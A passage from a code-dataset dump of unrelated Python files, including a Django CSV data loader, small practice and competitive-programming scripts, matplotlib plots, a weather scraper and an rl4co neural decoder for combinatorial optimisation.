Phase\r\nfrom ..models import DrawingStatus\r\nfrom ..models import Department\r\nfrom ..models import Discipline\r\nfrom ..models import DrawingKind\r\nfrom ..models import Drawing\r\nfrom ..models import Revision\r\nfrom ..models import Comment\r\nfrom ..models import Reply\r\nfrom ..models import Project\r\n\r\nimport os\r\nimport datetime\r\nfrom django.utils import timezone\r\nimport pytz\r\n\r\nlocation = os.path.dirname(os.path.realpath(__file__))\r\nblock_file = 'blocks.csv'\r\nphase_file = 'phases.csv'\r\nproject_file = 'projects.csv'\r\ndepartment_file = 'departments.csv'\r\ndiscipline_file = 'disciplines.csv'\r\ndrawing_file = 'drawings.csv'\r\ndrawing_kinds_file = 'drawing_kinds.csv'\r\ndrawing_status_file = 'drawing_statuses.csv'\r\nexpected_dates_file = 'expected_drawing_dates.csv'\r\n\r\ndef available():\r\n print('\\n{}:'.format(location))\r\n for f in os.listdir(location):\r\n if os.path.isfile(os.path.join(location, f)):\r\n print(' -> {}'.format(f))\r\n\r\n\r\ndef _pack_info(keys, info_raw):\r\n info = {}\r\n for line in info_raw:\r\n items = line.split(',')\r\n for i, key in enumerate(keys):\r\n try:\r\n info[key].append(items[i].strip().lower())\r\n except KeyError:\r\n info[key] = []\r\n return info\r\n\r\n\r\ndef _parse_file(name=None, headers=True):\r\n if not name:\r\n return None\r\n file_path = os.path.join(location, name)\r\n with open(file_path, 'r') as f:\r\n info_raw = [line.strip('\\n').strip() for line in f\\\r\n if line.strip('\\n').strip() != '']\r\n\r\n if headers:\r\n head_raw = info_raw.pop(0)\r\n head = [item.strip().lower() for item in head_raw.split(',')]\r\n return _pack_info(head, info_raw)\r\n else:\r\n fhead = name.split('.')[0]\r\n info = {fhead:[]}\r\n for line in info_raw:\r\n info[fhead].append(line.strip().lower())\r\n return info\r\n\r\n\r\ndef add_blocks():\r\n print('Populating Blocks...')\r\n info = _parse_file(name=block_file, headers=False)\r\n keyval = block_file.split('.')[0]\r\n already = Block.objects.all()\r\n prev = [block.name for block in already]\r\n added = len(prev)\r\n test = set(prev)\r\n print('->> Total already in: {}'.format(added))\r\n for item in info[keyval]:\r\n if item not in test:\r\n new_block = Block(name=item)\r\n new_block.save()\r\n test.add(item)\r\n added += 1\r\n print(' -> Added Block: {}'.format(item))\r\n print('->> Total added: {}'.format(added - len(prev)))\r\n\r\n\r\ndef add_projects():\r\n print('Populating Projects...')\r\n info = _parse_file(name=project_file, headers=False)\r\n keyval = project_file.split('.')[0]\r\n already = Project.objects.all()\r\n prev = [proj.name for proj in already]\r\n added = len(prev)\r\n test = set(prev)\r\n print('->> Total already in: {}'.format(added))\r\n for item in info[keyval]:\r\n if item not in test:\r\n new_proj = Project(name=item)\r\n new_proj.save()\r\n test.add(item)\r\n added += 1\r\n print(' -> Added Project: {}'.format(item))\r\n print('->> Total added: {}'.format(added - len(prev)))\r\n\r\n\r\ndef add_drawing_statuses():\r\n info = _parse_file(name=drawing_status_file, headers=False)\r\n keyval = drawing_status_file.split('.')[0]\r\n already = DrawingStatus.objects.all()\r\n prev = [dwg_st.status for dwg_st in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_dwg_status = DrawingStatus(status=item)\r\n new_dwg_status.save()\r\n added.append(item)\r\n print(' -> Added Dwg Status: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - 
len(prev)))\r\n\r\n\r\ndef add_departments():\r\n info = _parse_file(name=department_file, headers=False)\r\n keyval = department_file.split('.')[0]\r\n already = Department.objects.all()\r\n prev = [dep.name for dep in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_dep = Department(name=item)\r\n new_dep.save()\r\n added.append(item)\r\n print(' -> Added Department: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_disciplines():\r\n info = _parse_file(name=discipline_file, headers=False)\r\n keyval = discipline_file.split('.')[0]\r\n already = Discipline.objects.all()\r\n prev = [disc.name for disc in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_disc = Discipline(name=item)\r\n new_disc.save()\r\n added.append(item)\r\n print(' -> Added Discipline: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_drawing_kinds():\r\n info = _parse_file(name=drawing_kinds_file, headers=False)\r\n keyval = drawing_kinds_file.split('.')[0]\r\n already = DrawingKind.objects.all()\r\n prev = [dwg_kind.name for dwg_kind in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_dwg_kind = DrawingKind(name=item)\r\n new_dwg_kind.save()\r\n added.append(item)\r\n print(' -> Added Dwg Kind: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\ndef find_phases():\r\n print('finding phases in drawings.csv')\r\n info = _parse_file(name=drawing_file, headers=True)\r\n phases = set()\r\n for i in range(len(info[list(info.keys())[0]])):\r\n ph = info['phase'][i].lower()\r\n phases.add(ph)\r\n\r\n with open(os.path.join(location, 'phases.csv'), 'w') as pfile:\r\n for item in phases:\r\n print(item)\r\n pfile.write('{}\\n'.format(item))\r\n\r\n\r\ndef add_phases():\r\n print('Looking for phase file')\r\n if phase_file not in os.listdir(location):\r\n print('phase file not found...')\r\n find_phases()\r\n\r\n print('Populating Phases...')\r\n info = _parse_file(name=phase_file, headers=False)\r\n keyval = phase_file.split('.')[0]\r\n already = Phase.objects.all()\r\n prev = [phase.number for phase in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_phase = Phase(number=item)\r\n new_phase.save()\r\n added.append(item)\r\n print(' -> Added Phase: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_drawings():\r\n info = _parse_file(name=drawing_file, headers=True)\r\n print(' | '.join(['{}:{}'.format(key, val[0]) for key, val in info.items()]))\r\n\r\n total = len(info[[i for i in info.keys()][0]])\r\n \r\n added = 0\r\n for i in range(total):\r\n name = info['name'][i].lower()\r\n if not Drawing.objects.filter(name=name).exists():\r\n print('-> {}'.format(info['block'][i]), end='')\r\n if info['block'][i] == '0':\r\n info['block'][i] = 'misc'\r\n block = Block.objects.get(name=info['block'][i]) if info['block'][i] \\\r\n and info['block'][i] != '0'\\\r\n and info['block'][i] != 'none'\\\r\n else None\r\n status = DrawingStatus.objects.get(status='new')\r\n dep = Department.objects.get(name=info['department'][i]) if info['department'][i] else 
None\r\n            disc = Discipline.objects.get(name=info['discipline'][i]) if info['discipline'][i] else None\r\n            kind = DrawingKind.objects.get(name=info['kind'][i]) if info['kind'][i] else None\r\n            phase = Phase.objects.get(number=info['phase'][i]) if info['phase'][i] else None\r\n            if 'project' in info:\r\n                proj = Project.objects.get(name=info['project'][i]) if info['project'][i] else None\r\n            else:\r\n                proj = Project.objects.get(name='cv3600')\r\n            new_dwg = Drawing(name=name,\r\n                              desc=info['desc'][i] if info['desc'][i] else None,\r\n                              phase=phase,\r\n                              project=proj,\r\n                              #block=block,\r\n                              status=status,\r\n                              department=dep,\r\n                              discipline=disc,\r\n                              kind=kind,\r\n                              )\r\n            new_dwg.save()\r\n            new_dwg.block.add(block)\r\n            new_dwg.save()\r\n            added += 1\r\n            print(' -> Added Drawing: {}'.format(name))\r\n\r\n    print('->> Total Added: {}'.format(added))\r\n\r\n\r\ndef add_expected_dates():\r\n    info = _parse_file(name=expected_dates_file, headers=True)\r\n    current_tz = pytz.timezone(\"America/New_York\")\r\n    for i in range(len(info['name'])):\r\n        name = info['name'][i]\r\n        if name:\r\n            date = None\r\n            exp_date = None\r\n            if info['date'][i]:\r\n                date = info['date'][i]\r\n                exp_date = current_tz.localize(datetime.datetime.strptime(date, '%m/%d/%Y'), is_dst=None)\r\n            \r\n\r\n            if Drawing.objects.filter(name=name).exists(): \r\n                d = Drawing.objects.get(name=name)\r\n                d.expected = exp_date\r\n                d.save()\r\n                #update(expected=exp_date)\r\n                print('  -> updated {} with date {}'.format(name, exp_date))\r\n            \r\n\r\n\r\n","repo_name":"jaemk/drc","sub_path":"tracking/modelinfo/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":9867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13643742628","text":"import random as rd\n\nclass Car:\n    def __init__(self) -> None:\n        self.dist = 0\n        self.fuel = 100\n        print(\"부릉부릉~!\")  # \"Vroom vroom~!\"\n\n    def act(self):\n        a = rd.randint(0, 4)\n        if a == 0: self.go()\n        elif a == 1: self.stop()\n        elif a == 2: self.left()\n        elif a == 3: self.right()\n        elif a == 4: self.uturn()\n\n    def go(self):\n        self.fuel -= 15\n        self.dist += 3\n        print(\"드가자!!\")  # \"Let's go!!\"\n\n    def stop(self):\n        self.fuel -= 5\n        self.dist += 1\n        print(\"이건 좀...;;\")  # \"this is a bit...;;\"\n\n    def left(self):\n        self.fuel -= 10\n        self.dist += 2\n        print(\"왼\")  # \"left\"\n\n    def right(self):\n        self.fuel -= 10\n        self.dist += 2\n        print(\"우\")  # \"right\"\n\n    def uturn(self):\n        self.fuel -= 10\n        self.dist += 2\n        print(\"풀백!!!\")  # \"pull back!!!\"\n\n    def checkFuel(self):\n        return (self.fuel <= 0)\n    \n\nmekaCar = Car()\n\nwhile True:\n    if mekaCar.checkFuel():\n        print(\"못달리뮤ㅠ\")  # \"can't run anymore ㅠ\"\n        print(f\"남은 연료: {mekaCar.fuel}\")  # remaining fuel\n        print(f\"달린 거리: {mekaCar.dist}\")  # distance driven\n        break\n    \n    mekaCar.act()","repo_name":"hki2345/KOPOAcademy","sub_path":"py_workstation/Practice_230623/carClass.py","file_name":"carClass.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23647661554","text":"print(\"You have \" + str(guesses) + \" left.\")\nprint(\"Available letters: \" + get_available_letters(letters_guessed))\nans = input(\"Please guess a letter: \")\nif ans.isalpha():\n    letters_guessed.append(ans.lower())\nelse:\n    warnings -= 1\n    if warnings == 0:\n        guesses -= 1\n        print(\"You have one less guess as you have inputted the wrong thing 3 times, guesses: \" + str(guesses))\n        warnings = 3\n\n    print(\"Oops! That is not a valid letter. 
You have \" + warnings + \" warnings left: \" + get_guessed_word(secret_word, letters_guessed))\nans = input(\"Please guess a letter: \")\nvalid = new_round()\n","repo_name":"ArthurAllilaire/MIT-6.0001-introduction-to-computer-science-assignments","sub_path":"ps2/Hangman scrap.py","file_name":"Hangman scrap.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27281025638","text":"\n# https://atcoder.jp/contests/abc140/tasks/abc140_e\n# https://atcoder.jp/contests/agc005/tasks/agc005_b\n# https://atcoder.jp/contests/abc157/tasks/abc157_e\n\n''' \n [Bit]\n'''\ndef modinv(a,m):\n b, u, v = m, 1, 0\n while b:\n t = a//b\n a -= t*b\n a,b = b,a\n u -= t * v\n u,v = v,u\n u %= m\n return u\n \n\nMOD=998244353\nclass Bit:\n \"\"\" used for only int(>=0) \n 0-indexed \n \"\"\"\n def __init__(self, n):\n self.size = n\n self.tree = [0] * (n + 1)\n self.depth = n.bit_length()\n \n def _sum(self, i):\n i+=1\n s = 0\n while i > 0:\n s += self.tree[i]\n if s>MOD:s-=MOD\n i -= i & -i\n return s\n\n def sum(self,l,r):\n return (self._sum(r-1)-self._sum(l-1))%MOD\n \n def add(self, i, x):\n i+=1\n while i <= self.size:\n self.tree[i] += x\n i += i & -i\n\n def lower_bound(self, x):\n \"\"\" 累積和がx以上になる最小のindexと、その直前までの累積和 \"\"\"\n sum_ = 0\n pos = 0\n for i in range(self.depth, -1, -1):\n k = pos + (1 << i)\n if k <= self.size and sum_ + self.tree[k] < x:\n sum_ += self.tree[k]\n pos += 1 << i\n return pos, sum_\n\n def get_less_than_x_cnt(self, x):\n \"\"\" 累積和がx未満 の個数 \"\"\"\n lb_pos, lb_sum = self.lower_bound(x)\n return lb_pos-1\n\n def get_less_than_and_x_cnt(self, x):\n \"\"\" 累積和がx以下 の個数 \"\"\"\n lb_pos, lb_sum = self.lower_bound(x+1)\n return lb_pos-1\n \n def get_more_than_x_cnt(self, x):\n \"\"\" 累積和がxより大きい 個数 \"\"\"\n return self.size - self.get_less_than_and_x_cnt(x)\n\n\n# if __name__ == \"__main__\":\n# bit=Bit(5)\n# bit.add(0,1)\n# bit.add(1,2)\n# bit.add(2,3)\n# bit.add(3,4)\n# bit.add(4,5)\n# print(bit.lower_bound(2))\n\ndef main():\n n=int(input())\n al=list(map(int, input().split()))\n ail=[(a,i) for i,a in enumerate(al)]\n ail.sort()\n bit=Bit(n+1)\n p2=[1]\n for i in range(n):\n p2.append((p2[-1]*2)%MOD)\n ans=0\n for a,i in ail:\n bit.add(i, p2[n-1-i])\n val=bit.sum(0,i)\n dist=n-i\n val*=modinv(p2[dist],MOD)\n ans+=val\n ans%=MOD\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nami4mo/competitive-programming","sub_path":"1_contest/current/abc221/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28138301909","text":"import sys\r\nfrom collections import defaultdict\r\n\r\ns, p = map(int, sys.stdin.readline().split())\r\ndna = sys.stdin.readline().rstrip()\r\ntmp = list(map(int, sys.stdin.readline().split()))\r\nchk = ['A', 'C', 'G', 'T']\r\nchk_count = defaultdict(int)\r\nfor i in range(4):\r\n chk_count[chk[i]] = tmp[i]\r\n# init\r\ncount = defaultdict(int)\r\nfor w in dna[:p]:\r\n count[w] += 1\r\nstart = 0\r\nanswer = 0\r\nwhile start <= len(dna) - p:\r\n # 체크 후\r\n if count['A'] >= chk_count['A'] and count['C'] >= chk_count['C'] and count['G'] >= chk_count['G'] and count['T'] >= chk_count['T']:\r\n answer += 1\r\n # 이동\r\n count[dna[start]] -= 1\r\n if start + p < s:\r\n count[dna[start+p]] += 1\r\n start += 1\r\n\r\nprint(answer)\r\n\r\n\r\n","repo_name":"ggramgyo/PS_STUDY","sub_path":"백준/Silver/12891. 
DNA 비밀번호/DNA 비밀번호.py","file_name":"DNA 비밀번호.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39613406130","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\n\ndf1 = pd.read_csv('cleaned1.csv')\n\nx = df1['Units Sold']\ny = df1['Total Profit']\nplt.subplot(1,2,1)\nplt.plot(x,color='r')\nplt.title(\"Unit Sold\")\n\nplt.subplot(1,2,2)\nplt.plot(y,color='b')\n# title for the subplot\nplt.title(\"total profit\")\n# overall title\nplt.suptitle(\"comparison of unit sold and profit\")\nplt.show()\n\n\na=df1['year']\nb=df1['Sales Channel']\nplt.bar(a,b,color=['r','b'])\nplt.suptitle(\"Sales Channel calculation over 2010-2017\")\nplt.show()\n\nb=df1['Order Priority']\nplt.suptitle(\"order priority\")\nplt.hist(b)\nplt.legend()\nplt.show()\n\na= df1['Item Type']\nplt.suptitle(\"Overall item count\")\nitem_count = Counter(a)\nb=item_count.values()\nc=item_count.keys()\nplt.bar(c,b)\nplt.show()\n\na=df1['year']\ncount=Counter(a)\nb=count.values()\nplt.suptitle(\"pie chart for years\")\ntes_lables=[2010,2011,2012,2013,2014,2015,2016,2017]\nplt.pie(b,labels=tes_lables)\nplt.legend(title=\"year statistics\")\nplt.show()\n\n","repo_name":"sneham10/M7_datapreprocessing","sub_path":"code/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22860973744","text":"def x(n):\n\n if n<10:\n\n list1=[]\n\n list1.append(n)\n\n return list1\n\n else:\n\n s=n%10\n\n n=n//10\n\n list1=list(x(n))\n\n list1.append(s)\n\n return list1\n\nprint(x(12345))","repo_name":"Sunqk5665/Python_projects","sub_path":"算法手册源代码/3/di02.py","file_name":"di02.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"29967448110","text":"from dataclasses import dataclass\nfrom typing import Tuple, Union\n\nimport torch\nimport torch.nn as nn\n\nfrom einops import rearrange\nfrom tensordict import TensorDict\nfrom torch import Tensor\n\nfrom rl4co.envs import RL4COEnvBase, get_env\nfrom rl4co.models.nn.attention import LogitAttention\nfrom rl4co.models.nn.env_embeddings import env_context_embedding, env_dynamic_embedding\nfrom rl4co.models.nn.utils import decode_probs\nfrom rl4co.utils.ops import batchify, get_num_starts, select_start_nodes, unbatchify\nfrom rl4co.utils.pylogger import get_pylogger\n\nlog = get_pylogger(__name__)\n\n\n@dataclass\nclass PrecomputedCache:\n node_embeddings: Tensor\n graph_context: Union[Tensor, float]\n glimpse_key: Tensor\n glimpse_val: Tensor\n logit_key: Tensor\n\n\nclass AutoregressiveDecoder(nn.Module):\n \"\"\"Auto-regressive decoder for constructing solutions for combinatorial optimization problems.\n Given the environment state and the embeddings, compute the logits and sample actions autoregressively until\n all the environments in the batch have reached a terminal state.\n We additionally include support for multi-starts as it is more efficient to do so in the decoder as we can\n natively perform the attention computation.\n\n Note:\n There are major differences between this decoding and most RL problems. 
The most important one is\n that reward is not defined for partial solutions, hence we have to wait for the environment to reach a terminal\n state before we can compute the reward with `env.get_reward()`.\n\n Warning:\n We suppose environments in the `done` state are still available for sampling. This is because in NCO we need to\n wait for all the environments to reach a terminal state before we can stop the decoding process. This is in\n contrast with the TorchRL framework (at the moment) where the `env.rollout` function automatically resets.\n You may follow tighter integration with TorchRL here: https://github.com/kaist-silab/rl4co/issues/72.\n\n Args:\n env_name: environment name to solve\n embedding_dim: Dimension of the embeddings\n num_heads: Number of heads for the attention\n use_graph_context: Whether to use the initial graph context to modify the query\n select_start_nodes_fn: Function to select the start nodes for multi-start decoding\n linear_bias: Whether to use a bias in the linear projection of the embeddings\n context_embedding: Module to compute the context embedding. If None, the default is used\n dynamic_embedding: Module to compute the dynamic embedding. If None, the default is used\n \"\"\"\n\n def __init__(\n self,\n env_name: [str, RL4COEnvBase],\n embedding_dim: int,\n num_heads: int,\n use_graph_context: bool = True,\n select_start_nodes_fn: callable = select_start_nodes,\n linear_bias: bool = False,\n context_embedding: nn.Module = None,\n dynamic_embedding: nn.Module = None,\n **logit_attn_kwargs,\n ):\n super().__init__()\n\n if isinstance(env_name, RL4COEnvBase):\n env_name = env_name.name\n self.env_name = env_name\n self.embedding_dim = embedding_dim\n self.num_heads = num_heads\n\n assert embedding_dim % num_heads == 0\n\n self.context_embedding = (\n env_context_embedding(self.env_name, {\"embedding_dim\": embedding_dim})\n if context_embedding is None\n else context_embedding\n )\n self.dynamic_embedding = (\n env_dynamic_embedding(self.env_name, {\"embedding_dim\": embedding_dim})\n if dynamic_embedding is None\n else dynamic_embedding\n )\n self.use_graph_context = use_graph_context\n\n # For each node we compute (glimpse key, glimpse value, logit key) so 3 * embedding_dim\n self.project_node_embeddings = nn.Linear(\n embedding_dim, 3 * embedding_dim, bias=linear_bias\n )\n self.project_fixed_context = nn.Linear(\n embedding_dim, embedding_dim, bias=linear_bias\n )\n\n # MHA\n self.logit_attention = LogitAttention(\n embedding_dim, num_heads, **logit_attn_kwargs\n )\n\n self.select_start_nodes_fn = select_start_nodes_fn\n\n def forward(\n self,\n td: TensorDict,\n embeddings: Tensor,\n env: Union[str, RL4COEnvBase] = None,\n decode_type: str = \"sampling\",\n num_starts: int = None,\n softmax_temp: float = None,\n calc_reward: bool = True,\n ) -> Tuple[Tensor, Tensor, TensorDict]:\n \"\"\"Forward pass of the decoder\n Given the environment state and the pre-computed embeddings, compute the logits and sample actions\n\n Args:\n td: Input TensorDict containing the environment state\n embeddings: Precomputed embeddings for the nodes\n env: Environment to use for decoding. If None, the environment is instantiated from `env_name`. Note that\n it is more efficient to pass an already instantiated environment each time for fine-grained control\n decode_type: Type of decoding to use. 
Can be one of:\n - \"sampling\": sample from the logits\n - \"greedy\": take the argmax of the logits\n - \"multistart_sampling\": sample as sampling, but with multi-start decoding\n - \"multistart_greedy\": sample as greedy, but with multi-start decoding\n num_starts: Number of multi-starts to use. If None, will be calculated from the action mask\n softmax_temp: Temperature for the softmax. If None, default softmax is used from the `LogitAttention` module\n calc_reward: Whether to calculate the reward for the decoded sequence\n\n Returns:\n outputs: Tensor of shape (batch_size, seq_len, num_nodes) containing the logits\n actions: Tensor of shape (batch_size, seq_len) containing the sampled actions\n td: TensorDict containing the environment state after decoding\n \"\"\"\n\n # Multi-start decoding. If num_starts is None, we use the number of actions in the action mask\n if \"multistart\" in decode_type:\n if num_starts is None:\n num_starts = get_num_starts(td)\n else:\n if num_starts is not None:\n if num_starts > 1:\n log.warn(\n f\"num_starts={num_starts} is ignored for decode_type={decode_type}\"\n )\n num_starts = 0\n\n # Compute keys, values for the glimpse and keys for the logits once as they can be reused in every step\n cached_embeds = self._precompute_cache(embeddings, td=td, num_starts=num_starts)\n\n # Collect outputs\n outputs = []\n actions = []\n\n # Instantiate environment if needed\n if isinstance(env, str):\n env_name = self.env_name if env is None else env\n env = get_env(env_name)\n\n # Multi-start decoding: first action is chosen by ad-hoc node selection\n if num_starts > 1 or \"multistart\" in decode_type:\n action = self.select_start_nodes_fn(td, env, num_nodes=num_starts)\n\n # Expand td to batch_size * num_starts\n td = batchify(td, num_starts)\n\n td.set(\"action\", action)\n td = env.step(td)[\"next\"]\n log_p = torch.zeros_like(\n td[\"action_mask\"], device=td.device\n ) # first log_p is 0, so p = log_p.exp() = 1\n\n outputs.append(log_p)\n actions.append(action)\n\n # Main decoding: loop until all sequences are done\n while not td[\"done\"].all():\n log_p, mask = self._get_log_p(cached_embeds, td, softmax_temp, num_starts)\n\n # Select the indices of the next nodes in the sequences, result (batch_size) long\n action = decode_probs(log_p.exp(), mask, decode_type=decode_type)\n\n td.set(\"action\", action)\n td = env.step(td)[\"next\"]\n\n # Collect output of step\n outputs.append(log_p)\n actions.append(action)\n\n outputs, actions = torch.stack(outputs, 1), torch.stack(actions, 1)\n if calc_reward:\n td.set(\"reward\", env.get_reward(td, actions))\n\n return outputs, actions, td\n\n def _precompute_cache(\n self, embeddings: Tensor, num_starts: int = 0, td: TensorDict = None\n ):\n \"\"\"Compute the cached embeddings for the attention\n\n Args:\n embeddings: Precomputed embeddings for the nodes\n num_starts: Number of multi-starts to use. If 0, no multi-start decoding is used\n td: TensorDict containing the environment state.\n This one is not used in this class. 
However, passing Tensordict can be useful in child classes.\n \"\"\"\n\n # The projection of the node embeddings for the attention is calculated once up front\n (\n glimpse_key_fixed,\n glimpse_val_fixed,\n logit_key_fixed,\n ) = self.project_node_embeddings(embeddings).chunk(3, dim=-1)\n\n # Optionally disable the graph context from the initial embedding as done in POMO\n if self.use_graph_context:\n graph_context = unbatchify(\n batchify(self.project_fixed_context(embeddings.mean(1)), num_starts),\n num_starts,\n )\n else:\n graph_context = 0\n\n # Organize in a dataclass for easy access\n cached_embeds = PrecomputedCache(\n node_embeddings=embeddings,\n graph_context=graph_context,\n glimpse_key=glimpse_key_fixed,\n glimpse_val=glimpse_val_fixed,\n logit_key=logit_key_fixed,\n )\n\n return cached_embeds\n\n def _get_log_p(\n self,\n cached: PrecomputedCache,\n td: TensorDict,\n softmax_temp: float = None,\n num_starts: int = 0,\n ):\n \"\"\"Compute the log probabilities of the next actions given the current state\n\n Args:\n cache: Precomputed embeddings\n td: TensorDict with the current environment state\n softmax_temp: Temperature for the softmax\n num_starts: Number of starts for the multi-start decoding\n \"\"\"\n # Unbatchify to [batch_size, num_starts, ...]. Has no effect if num_starts = 0\n td_unbatch = unbatchify(td, num_starts)\n\n step_context = self.context_embedding(cached.node_embeddings, td_unbatch)\n glimpse_q = step_context + cached.graph_context\n glimpse_q = glimpse_q.unsqueeze(1) if glimpse_q.ndim == 2 else glimpse_q\n\n # Compute keys and values for the nodes\n (\n glimpse_key_dynamic,\n glimpse_val_dynamic,\n logit_key_dynamic,\n ) = self.dynamic_embedding(td_unbatch)\n glimpse_k = cached.glimpse_key + glimpse_key_dynamic\n glimpse_v = cached.glimpse_val + glimpse_val_dynamic\n logit_k = cached.logit_key + logit_key_dynamic\n\n # Get the mask\n mask = ~td_unbatch[\"action_mask\"]\n\n # Compute logits\n log_p = self.logit_attention(\n glimpse_q, glimpse_k, glimpse_v, logit_k, mask, softmax_temp\n )\n\n # Now we need to reshape the logits and log_p to [batch_size*num_starts, num_nodes]\n # Note that rearranging order is important here\n log_p = rearrange(log_p, \"b s l -> (s b) l\") if num_starts > 1 else log_p\n mask = rearrange(mask, \"b s l -> (s b) l\") if num_starts > 1 else mask\n return log_p, mask\n","repo_name":"kaist-silab/rl4co","sub_path":"rl4co/models/zoo/common/autoregressive/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":11609,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"31"} +{"seq_id":"73943580887","text":"#coding=utf-8\nimport sys\nimport re\nimport urllib\n\n#reload(sys)\n#sys.setdefaultencoding('gbk')\n\ndef getHtml(url):\n page = urllib.urlopen(url)\n mybytes = page.read()\n html = mybytes.decode(\"utf8\")\n page.close()\n return html\n\ndef getWeather(html):\n reg = r'(.*?).*?'\n reg += r'(.*?).*?(.*?)'\n weatherList = re.compile(reg).findall(html)\n return weatherList;\n\nweatherList = getWeather(getHtml(r\"http://www.weather.com.cn/shanghai/index.shtml\"))\nfor weather in weatherList :\n print(\"{0} Night:{1} / Day:{2} {3}/{4}\".format(weather[0], weather[1], weather[2], weather[3], weather[4]))\n","repo_name":"jiguang123/Python-Spider-Action","sub_path":"GetWeather.py","file_name":"GetWeather.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
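+The AutoregressiveDecoder record above selects each action from masked log-probabilities via decode_probs(log_p.exp(), mask, decode_type=decode_type), where the mask comes from mask = ~td["action_mask"] (True marks an infeasible node). Below is a minimal self-contained sketch of that selection step, assuming [batch, num_nodes] tensors; the helper name decode_step is hypothetical and this is not rl4co's actual decode_probs implementation:
+
+```python
+# Illustrative sketch of masked greedy/sampling action selection (assumed shapes/names).
+import torch
+
+def decode_step(log_p: torch.Tensor, mask: torch.Tensor, decode_type: str = "sampling") -> torch.Tensor:
+    # log_p: [batch, num_nodes] log-probabilities; mask: True where a node is infeasible
+    probs = log_p.exp().masked_fill(mask, 0.0)  # zero out infeasible nodes
+    if decode_type == "greedy":
+        return probs.argmax(dim=-1)  # highest-probability feasible node per row
+    if decode_type == "sampling":
+        # torch.multinomial accepts unnormalized non-negative weights,
+        # so the zeroed entries need no manual renormalization
+        return torch.multinomial(probs, 1).squeeze(-1)
+    raise ValueError(f"unknown decode_type: {decode_type}")
+
+# Usage: two environments, three nodes, node 0 infeasible in the first row
+log_p = torch.log_softmax(torch.randn(2, 3), dim=-1)
+mask = torch.tensor([[True, False, False], [False, False, False]])
+print(decode_step(log_p, mask, "greedy"))
+```
+
+For the "multistart_*" decode types the same step runs unchanged on the batchified [batch * num_starts, num_nodes] tensors, which is why _get_log_p rearranges log_p and mask back to that flat shape before returning them.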
+{"seq_id":"12157894232","text":"from ListLink import ListLink, ListNode\nclass Solution:\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n tmp = ListNode('#')\n tmp.next = head\n p1, p2 = tmp, head\n while p2 and p2.val < x:p1, p2 = p2, p2.next\n p3, p4 = p2, p2.next\n while p4:\n if p4.val < x:\n p1.next, p3.next = p4, p4.next\n p4.next, p1, p4 = p2, p4, p3.next\n else:\n p3, p4 = p4, p4.next\n return tmp.next\n\nprint(Solution().partition(ListLink([2, 1]).head, 2))","repo_name":"mavis0/LeetCode","sub_path":"Partition List.py","file_name":"Partition List.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6608695832","text":"from django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render,redirect,reverse\nimport string, random\nimport unidecode\nimport os\n\nclass Utility:\n @classmethod\n def get_random_string(cls,length=15):\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n \n @classmethod\n def url_stringify(cls,string_pattern,sep=\"-\"):\n \"\"\"Function who take a string and transform it to url \n String by removing all special character, remove all space,\n and replace thems by a -\"\"\"\n final_str=unidecode.unidecode(string_pattern)\n final_str=final_str.strip()\n final_str=final_str.replace('\\s+',' ')\n final_str=final_str.replace(\" \",sep)\n #print(final_str)\n #print(string_pattern)\n return final_str\n \n @classmethod\n def remove_accent(cls,chre):\n \"\"\"remove all accent characters from a chre string\"\"\"\n return unidecode.unidecode(chre)\n \n @classmethod\n def is_null_or_empty(cls,chaine,null_function=''):\n \"\"\"Function who find is value is null or empty. white space are removed\n you can pass your own function who test is value is null with param\n @null_function, for example null_function=is_none \"\"\"\n if(null_function==''):\n if chaine is None:\n return True\n else:\n if(null_function(chaine)):\n return True\n try:\n if(chaine.strip()==\"\"):\n return True\n except Exception as e:\n return False\n\n 